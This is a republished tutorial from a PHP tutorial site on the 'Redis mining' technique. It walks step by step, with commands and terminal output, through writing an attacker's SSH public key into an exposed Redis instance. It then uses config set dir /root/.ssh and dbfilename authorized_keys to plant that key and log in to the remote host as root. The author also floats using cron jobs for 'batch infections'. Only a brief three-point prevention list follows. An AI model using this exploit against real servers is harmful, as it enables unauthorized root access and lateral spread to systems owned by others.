Home > Database > Redis > Let's talk about the principles of Redis mining (detailed examples)

Let's talk about the principles of Redis mining (detailed examples)

WBOY
Release: 2022-02-23 17:58:08
forward
3255 people have browsed it

This article brings you relevant knowledge about the Redis mining principle. Let’s demonstrate how to use Redis to escalate privileges to obtain the Root user of the remote server, and how to protect it. I hope it will help Everyone is helpful.

Let's talk about the principles of Redis mining (detailed examples)

Recommended learning: Redis video tutorial

Today we will demonstrate how to obtain the Root user of the remote server through privilege escalation through Redis .

1. First we need some prerequisites

  • Condition 1: You must first have a Redis, and we must know its port【 Default 6379];

  • Condition 2: The password for Redis cannot be too complex, or there is no password;

  • Condition 3: The user who starts Redis must be the most It is better to be a Root user, which is more destructive;

2. Start making trouble

  • ##2.1 Create a pair of secret keys

#Generate a pair through ssh-keygen. Of course, you can use the existing ones without any problem.

root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Copy after login
Next, the attack key value is generated through the public key.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
Copy after login
The content is as follows

root@kali:/tmp/rediskey# cat foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
Copy after login
The purpose of adding two newlines before and after here is to prevent the data from being connected together and causing failure problems.

  • 2.2 Configure Key to Redis

The operation is as follows:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK
Copy after login
Log in to Redis to check , whether it has been written into Redis.

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
Copy after login
  • 2.3 Replace system files through the Redis saving mechanism

And see the following operations

192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit
Copy after login
At this time, we log in to the remote host to see the effect.

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~#
Copy after login
OK, we have successfully escalated our rights here, so let’s take a look at what the exported file is? In fact, it is just the saved file form of Redis. If you are interested, you can open it yourself and have a look. It will not be shown here.

3. How to prevent

This vulnerability is quite powerful. We only have one host permission now, add it to the scheduled task to execute some scripts, and then What about batch infections?

Tips for prevention are as follows:

  • Redis should not listen on dangerous IPs. If so, please add firewall control

  • Redis Password restrictions must be increased and cannot be weak passwords;

  • Try not to start Redis as the Root user.

Do the above three points to prevent Redis mining, no problem

Recommended learning:

Redis video tutorial

The above is the detailed content of Let's talk about the principles of Redis mining (detailed examples). For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:csdn.net
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template